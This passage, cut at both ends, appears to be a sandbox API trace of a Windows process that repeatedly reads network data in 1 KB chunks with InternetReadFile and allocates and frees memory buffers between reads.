lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.730] VirtualAlloc (lpAddress=0x4750000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0121.730] VirtualAlloc (lpAddress=0x4750000, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0121.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4b20000 [0121.731] VirtualAlloc (lpAddress=0x4b20000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.736] VirtualFree (lpAddress=0x4748000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0121.737] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.737] VirtualAlloc (lpAddress=0x4b2c000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b2c000 [0121.739] VirtualFree (lpAddress=0x4b20000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0121.758] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.758] VirtualAlloc (lpAddress=0x4b38000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0121.760] VirtualFree (lpAddress=0x4b28000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.761] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.761] VirtualAlloc (lpAddress=0x4b20000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.764] VirtualFree (lpAddress=0x4b34000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.764] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.765] VirtualFree (lpAddress=0x4b40000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.766] VirtualAlloc (lpAddress=0x4b2c000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b2c000 [0121.767] VirtualFree (lpAddress=0x4b20000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0121.768] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.768] VirtualAlloc (lpAddress=0x4b38000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0121.775] VirtualFree (lpAddress=0x4b28000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.775] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.775] VirtualAlloc (lpAddress=0x4b20000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.777] VirtualFree (lpAddress=0x4b34000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.778] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.778] VirtualAlloc (lpAddress=0x4b2c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b2c000 [0121.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.779] VirtualFree (lpAddress=0x4b40000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.780] VirtualAlloc (lpAddress=0x4b30000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0121.782] VirtualFree (lpAddress=0x4b20000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.783] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.783] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0121.783] VirtualFree (lpAddress=0x4b3c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.786] VirtualFree (lpAddress=0x4b2c000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.787] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.787] VirtualFree (lpAddress=0x4b38000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.787] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.789] VirtualFree (lpAddress=0x4b40000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.843] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.843] VirtualAlloc (lpAddress=0x4b30000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0121.845] VirtualFree (lpAddress=0x4b20000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.847] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0121.848] VirtualFree (lpAddress=0x4b3c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.851] VirtualFree (lpAddress=0x4b2c000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.852] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.852] VirtualFree (lpAddress=0x4b38000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.852] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.854] VirtualFree (lpAddress=0x4b40000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.856] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.856] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.857] VirtualAlloc (lpAddress=0x4b30000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0121.859] VirtualFree (lpAddress=0x4b20000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.860] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.860] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0121.861] VirtualFree (lpAddress=0x4b3c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.865] VirtualFree (lpAddress=0x4b2c000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.866] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.866] VirtualFree (lpAddress=0x4b38000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.866] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.868] VirtualFree (lpAddress=0x4b40000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.869] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.870] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.870] VirtualAlloc (lpAddress=0x4b30000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0121.872] VirtualFree (lpAddress=0x4b20000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.873] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0121.875] VirtualFree (lpAddress=0x4b2c000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.876] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.879] VirtualFree (lpAddress=0x4b3c000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.881] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.882] VirtualAlloc (lpAddress=0x4b30000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0121.884] VirtualFree (lpAddress=0x4b20000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0121.886] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.886] VirtualAlloc (lpAddress=0x4b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0121.888] VirtualFree (lpAddress=0x4b2c000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.889] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.889] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.891] VirtualFree (lpAddress=0x4b3c000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.893] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.893] VirtualAlloc (lpAddress=0x4b30000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0121.894] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.894] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.896] VirtualAlloc (lpAddress=0x4b34000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b34000 [0121.898] VirtualFree (lpAddress=0x4b20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.901] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0121.901] VirtualFree (lpAddress=0x4b44000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.905] VirtualFree (lpAddress=0x4b30000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.906] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.906] VirtualFree (lpAddress=0x4b40000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0121.907] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0121.909] VirtualFree (lpAddress=0x4b48000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0121.911] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.046] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.047] VirtualAlloc (lpAddress=0x4b34000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b34000 [0122.049] VirtualFree (lpAddress=0x4b20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.051] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.051] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.052] VirtualFree (lpAddress=0x4b44000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.054] VirtualFree (lpAddress=0x4b30000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.055] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.055] VirtualFree (lpAddress=0x4b40000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.056] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.058] VirtualFree (lpAddress=0x4b48000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.060] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.061] VirtualAlloc (lpAddress=0x4b34000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b34000 [0122.063] VirtualFree (lpAddress=0x4b20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.065] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.066] VirtualFree (lpAddress=0x4b44000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.070] VirtualFree (lpAddress=0x4b30000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.071] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.071] VirtualFree (lpAddress=0x4b40000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.072] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.074] VirtualFree (lpAddress=0x4b48000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.076] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.077] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.077] VirtualAlloc (lpAddress=0x4b34000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b34000 [0122.079] VirtualFree (lpAddress=0x4b20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.081] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.082] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.084] VirtualFree (lpAddress=0x4b30000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.085] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.085] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.087] VirtualFree (lpAddress=0x4b44000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.089] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.091] VirtualAlloc (lpAddress=0x4b34000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b34000 [0122.093] VirtualFree (lpAddress=0x4b20000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0122.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.095] VirtualAlloc (lpAddress=0x4b48000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b48000 [0122.097] VirtualFree (lpAddress=0x4b30000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.098] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.100] VirtualFree (lpAddress=0x4b44000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.102] VirtualAlloc (lpAddress=0x4b34000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b34000 [0122.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.102] VirtualFree (lpAddress=0x4b58000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.104] VirtualAlloc (lpAddress=0x4b38000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0122.107] VirtualFree (lpAddress=0x4b20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.109] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.109] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.112] VirtualFree (lpAddress=0x4b34000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.114] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.114] VirtualFree (lpAddress=0x4b48000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.114] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.118] VirtualFree (lpAddress=0x4b50000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.120] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.120] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.120] VirtualAlloc (lpAddress=0x4b38000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0122.123] VirtualFree (lpAddress=0x4b20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.125] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.125] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.126] VirtualFree (lpAddress=0x4b4c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.129] VirtualFree (lpAddress=0x4b34000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.130] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.131] VirtualFree (lpAddress=0x4b48000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.131] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.134] VirtualFree (lpAddress=0x4b50000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.136] VirtualFree (lpAddress=0x4b64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.137] VirtualAlloc (lpAddress=0x4b38000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b38000 [0122.139] VirtualFree (lpAddress=0x4b20000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0122.141] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.142] VirtualAlloc (lpAddress=0x4b50000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b50000 [0122.142] 